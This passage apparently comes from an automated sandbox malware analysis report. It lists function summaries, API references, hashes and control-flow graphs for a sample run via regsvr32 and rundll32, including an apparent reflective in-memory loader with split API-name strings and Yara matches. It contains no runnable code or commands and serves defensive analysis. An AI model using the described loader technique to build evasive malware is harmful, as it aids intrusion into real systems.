                                                                                                                                                  • Part of subcall function 00007FFC67206550: GetCurrentProcess.KERNEL32 ref: 00007FFC67206658
                                                                                                                                                  • Part of subcall function 00007FFC67206550: TerminateProcess.KERNEL32 ref: 00007FFC67206666
                                                                                                                                                • free.LIBCMT ref: 00007FFC672058D6
                                                                                                                                                  • Part of subcall function 00007FFC67203024: HeapFree.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720303A
                                                                                                                                                  • Part of subcall function 00007FFC67203024: _errno.LIBCMT ref: 00007FFC67203044
                                                                                                                                                  • Part of subcall function 00007FFC67203024: GetLastError.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720304C
                                                                                                                                                • free.LIBCMT ref: 00007FFC672058F5
                                                                                                                                                • free.LIBCMT ref: 00007FFC67205911
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2294642566-0
                                                                                                                                                • Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                                                                                                • Instruction ID: 4276924d7a7fa8404bc77b12295b10cff6bcbd15995a92ba7f941c287a3cb2b9
                                                                                                                                                • Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                                                                                                • Instruction Fuzzy Hash: A751C132B09AA9C2EB20DF27E8285692395FF84B9CF084435DE4D47785DE3CD982C360
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _getptd
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3186804695-0
                                                                                                                                                • Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                                                                                                • Instruction ID: 82e6001681c42e2e143193c40d9e8fa88a786f6035bb0c90afb2a43c9544141e
                                                                                                                                                • Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                                                                                                • Instruction Fuzzy Hash: B081907260969AD6DB24CF26E1A87AA73A0FB44748F504536DB8D47754EF3CE450CB20
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _lock$DecodePointer_errno_getptd
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4201827665-0
                                                                                                                                                • Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                                                                                                • Instruction ID: 9a1507799716a424067acef19b74436ad6242f5f3a4d2dd500984cecef7d5beb
                                                                                                                                                • Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                                                                                                • Instruction Fuzzy Hash: 77515D71A0C66AC6FB549B27A8A8B7A2391FF44788F104835DA4D47791EE7DE481C730
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _errno$DecodePointercalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1531210114-0
                                                                                                                                                • Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                                                                                                • Instruction ID: cd13f8574b4c09fb64b3fe15b49106b081bea55c32b150bdfc0a917302f8c17c
                                                                                                                                                • Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                                                                                                • Instruction Fuzzy Hash: 6121A722B0C76AC5FB149B56947937B63A0AF44788F044834DB0C07B86DF7CD420CA34
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _lock.LIBCMT ref: 00007FFC672053B2
                                                                                                                                                • free.LIBCMT ref: 00007FFC672053D7
                                                                                                                                                  • Part of subcall function 00007FFC67203024: HeapFree.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720303A
                                                                                                                                                  • Part of subcall function 00007FFC67203024: _errno.LIBCMT ref: 00007FFC67203044
                                                                                                                                                  • Part of subcall function 00007FFC67203024: GetLastError.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720304C
                                                                                                                                                • _lock.LIBCMT ref: 00007FFC672053F2
                                                                                                                                                • free.LIBCMT ref: 00007FFC67205438
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _lockfree$ErrorFreeHeapLast_errno
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188102813-0
                                                                                                                                                • Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                                                                                                • Instruction ID: 9ee98894c7752e0a0a3a70345d57bfaff8117d473dd71ed1b6393f8a57a5456f
                                                                                                                                                • Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                                                                                                • Instruction Fuzzy Hash: 20113C21A0E52AC5FF54ABB3D479BB82390AF8070CF545935E71E162C6EE6CA885C371
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalDeleteSection$Freefree
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1250194111-0
                                                                                                                                                • Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                                                                                                • Instruction ID: e4cda339ad3770c2e4a5dd980ec7cd625021262249a79e32b64e6fce61869156
                                                                                                                                                • Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                                                                                                • Instruction Fuzzy Hash: 7D116331E0D56AC6E614DB16E4A423863A0FF45B58F584931DB5D02A95DF3CD5A1C730
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _lock$Sleep_errno_getptd
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2111406555-0
                                                                                                                                                • Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                                                                                                • Instruction ID: 6fc60f92a8de565253c68e6743dec5bbcffd4f9919da76def16de1102937b01e
                                                                                                                                                • Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                                                                                                • Instruction Fuzzy Hash: 64019E21A0D25AC6F744BBB3D469BBD6350EF44B88F008834D60D173C6DE2CA894C371
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _errno$_getptd
                                                                                                                                                • String ID: #
                                                                                                                                                • API String ID: 3432092939-1885708031
                                                                                                                                                • Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                                                                                                • Instruction ID: bff6a3a35bd2d3ffc70f3406aa67ac0dd75fe473b528921509b2910e3666245b
                                                                                                                                                • Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                                                                                                • Instruction Fuzzy Hash: E451A322A0C7D9C5D7308B26E86827EABA0FF85B48F584531DA9D13755CE3DD841CB21
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                                                                                                • Instruction ID: c0a8f02de2ceb39b2edfae624826b32734a106dca11ce9ef83e7c3291cb9be87
                                                                                                                                                • Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                                                                                                • Instruction Fuzzy Hash: 7951D432A0D6A9C6EA609F23E4681B977A1FF49B88F144935DB9E07781CE3CE451C730
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:10.7%
                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                Signature Coverage:0%
                                                                                                                                                Total number of Nodes:11
                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                execution_graph 3264 2ace68c0000 3265 2ace68c0183 3264->3265 3266 2ace68c043e VirtualAlloc 3265->3266 3270 2ace68c0462 3266->3270 3267 2ace68c0a7b 3268 2ace68c0531 GetNativeSystemInfo 3268->3267 3269 2ace68c056d VirtualAlloc 3268->3269 3274 2ace68c058b 3269->3274 3270->3267 3270->3268 3271 2ace68c0a00 3271->3267 3272 2ace68c0a56 RtlAddFunctionTable 3271->3272 3272->3267 3273 2ace68c09d9 VirtualProtect 3273->3274 3274->3271 3274->3273

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 2ace68c0000-2ace68c0460 call 2ace68c0aa8 * 2 VirtualAlloc 22 2ace68c048a-2ace68c0494 0->22 23 2ace68c0462-2ace68c0466 0->23 26 2ace68c049a-2ace68c049e 22->26 27 2ace68c0a91-2ace68c0aa6 22->27 24 2ace68c0468-2ace68c0488 23->24 24->22 24->24 26->27 28 2ace68c04a4-2ace68c04a8 26->28 28->27 29 2ace68c04ae-2ace68c04b2 28->29 29->27 30 2ace68c04b8-2ace68c04bf 29->30 30->27 31 2ace68c04c5-2ace68c04d2 30->31 31->27 32 2ace68c04d8-2ace68c04e1 31->32 32->27 33 2ace68c04e7-2ace68c04f4 32->33 33->27 34 2ace68c04fa-2ace68c0507 33->34 35 2ace68c0509-2ace68c0511 34->35 36 2ace68c0531-2ace68c0567 GetNativeSystemInfo 34->36 38 2ace68c0513-2ace68c0518 35->38 36->27 37 2ace68c056d-2ace68c0589 VirtualAlloc 36->37 39 2ace68c058b-2ace68c059e 37->39 40 2ace68c05a0-2ace68c05ac 37->40 41 2ace68c051a-2ace68c051f 38->41 42 2ace68c0521 38->42 39->40 44 2ace68c05af-2ace68c05b2 40->44 43 2ace68c0523-2ace68c052f 41->43 42->43 43->36 43->38 46 2ace68c05b4-2ace68c05bf 44->46 47 2ace68c05c1-2ace68c05db 44->47 46->44 48 2ace68c061b-2ace68c0622 47->48 49 2ace68c05dd-2ace68c05e2 47->49 51 2ace68c0628-2ace68c062f 48->51 52 2ace68c06db-2ace68c06e2 48->52 50 2ace68c05e4-2ace68c05ea 49->50 56 2ace68c060b-2ace68c0619 50->56 57 2ace68c05ec-2ace68c0609 50->57 51->52 53 2ace68c0635-2ace68c0642 51->53 54 2ace68c06e8-2ace68c06f9 52->54 55 2ace68c0864-2ace68c086b 52->55 53->52 58 2ace68c0648-2ace68c064f 53->58 59 2ace68c0702-2ace68c0705 54->59 60 2ace68c0917-2ace68c0929 55->60 61 2ace68c0871-2ace68c087f 55->61 56->48 56->50 57->56 57->57 63 2ace68c0654-2ace68c0658 58->63 64 2ace68c06fb-2ace68c06ff 59->64 65 2ace68c0707-2ace68c070a 59->65 66 2ace68c0a07-2ace68c0a1a 60->66 67 2ace68c092f-2ace68c0937 60->67 62 2ace68c090e-2ace68c0911 61->62 62->60 72 2ace68c0884-2ace68c08a9 62->72 69 2ace68c06c0-2ace68c06ca 63->69 64->59 70 2ace68c0788-2ace68c078e 65->70 71 2ace68c070c-2ace68c071d 65->71 87 2ace68c0a40-2ace68c0a4a 66->87 88 2ace68c0a1c-2ace68c0a27 66->88 68 2ace68c093b-2ace68c093f 67->68 73 2ace68c0945-2ace68c095a 68->73 74 2ace68c09ec-2ace68c09fa 68->74 78 2ace68c065a-2ace68c0669 69->78 79 2ace68c06cc-2ace68c06d2 69->79 75 2ace68c0794-2ace68c07a2 70->75 71->75 76 2ace68c071f-2ace68c0720 71->76 94 2ace68c08ab-2ace68c08b1 72->94 95 2ace68c0907-2ace68c090c 72->95 80 2ace68c097b-2ace68c097d 73->80 81 2ace68c095c-2ace68c095e 73->81 74->68 83 2ace68c0a00-2ace68c0a01 74->83 89 2ace68c07a8 75->89 90 2ace68c085d-2ace68c085e 75->90 86 2ace68c0722-2ace68c0784 76->86 84 2ace68c067a-2ace68c067e 78->84 85 2ace68c066b-2ace68c0678 78->85 79->63 91 2ace68c06d4-2ace68c06d5 79->91 97 2ace68c09a2-2ace68c09a4 80->97 98 2ace68c097f-2ace68c0981 80->98 92 2ace68c0960-2ace68c096c 81->92 93 2ace68c096e-2ace68c0979 81->93 83->66 99 2ace68c0680-2ace68c068a 84->99 100 2ace68c068c-2ace68c0690 84->100 96 2ace68c06bd-2ace68c06be 85->96 86->86 101 2ace68c0786 86->101 104 2ace68c0a7b-2ace68c0a8e 87->104 105 2ace68c0a4c-2ace68c0a54 87->105 102 2ace68c0a38-2ace68c0a3e 88->102 103 2ace68c07ae-2ace68c07d4 89->103 90->55 91->52 106 2ace68c09be-2ace68c09bf 92->106 93->106 114 2ace68c08bb-2ace68c08c8 94->114 115 2ace68c08b3-2ace68c08b9 94->115 95->62 96->69 112 2ace68c09a6-2ace68c09aa 97->112 113 2ace68c09ac-2ace68c09bb 97->113 107 2ace68c0989-2ace68c098b 98->107 108 2ace68c0983-2ace68c0987 98->108 109 2ace68c06b6-2ace68c06ba 99->109 110 2ace68c06a5-2ace68c06a9 100->110 111 2ace68c0692-2ace68c06a3 100->111 101->75 102->87 116 2ace68c0a29-2ace68c0a35 102->116 131 2ace68c0835-2ace68c0839 103->131 132 2ace68c07d6-2ace68c07d9 103->132 104->27 105->104 117 2ace68c0a56-2ace68c0a79 RtlAddFunctionTable 105->117 121 2ace68c09c5-2ace68c09cb 106->121 107->97 119 2ace68c098d-2ace68c098f 107->119 108->106 109->96 110->96 120 2ace68c06ab-2ace68c06b3 110->120 111->109 112->106 113->106 123 2ace68c08ca-2ace68c08d1 114->123 124 2ace68c08d3-2ace68c08e5 114->124 122 2ace68c08ea-2ace68c08fe 115->122 116->102 117->104 126 2ace68c0999-2ace68c09a0 119->126 127 2ace68c0991-2ace68c0997 119->127 120->109 128 2ace68c09d9-2ace68c09e9 VirtualProtect 121->128 129 2ace68c09cd-2ace68c09d3 121->129 122->95 142 2ace68c0900-2ace68c0905 122->142 123->123 123->124 124->122 126->121 127->106 128->74 129->128 135 2ace68c083b 131->135 136 2ace68c0844-2ace68c0850 131->136 133 2ace68c07db-2ace68c07e1 132->133 134 2ace68c07e3-2ace68c07f0 132->134 138 2ace68c0812-2ace68c082c 133->138 139 2ace68c07fb-2ace68c080d 134->139 140 2ace68c07f2-2ace68c07f9 134->140 135->136 136->103 141 2ace68c0856-2ace68c0857 136->141 138->131 144 2ace68c082e-2ace68c0833 138->144 139->138 140->139 140->140 141->90 142->94 144->132
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278202312.000002ACE68C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ACE68C0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_2ace68c0000_rundll32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                                • API String ID: 394283112-2517549848
                                                                                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                                • Instruction ID: 9ca41946d7a1ed44331080cc215c95d5c8a5b1468e08fa92745f093aca9952e2
                                                                                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                                • Instruction Fuzzy Hash: 0D720A30618B888BDB69DF18C9897B9B7E0FB95304F20462DE88AD3252DF35D545CB87
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                                • API String ID: 0-464535774
                                                                                                                                                • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                                • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                                • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                                • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                                • API String ID: 0-3528011396
                                                                                                                                                • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                                • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                                • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                                • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 228 180021bdf-180021bee 221->228 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 229 1800219e4-1800219ee 227->229 230 180021681-180021686 227->230 228->217 229->217 232 1800219d5-1800219df call 18001dfb4 230->232 233 18002168c-180021691 230->233 232->217 235 180021697-18002169c 233->235 236 18002190c-1800219a5 call 18000abac 233->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 246 1800219b2-1800219c6 243->246 247 1800219cb-1800219d0 243->247 244->224 246->217 247->217
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                                • API String ID: 0-3036092626
                                                                                                                                                • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                                • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
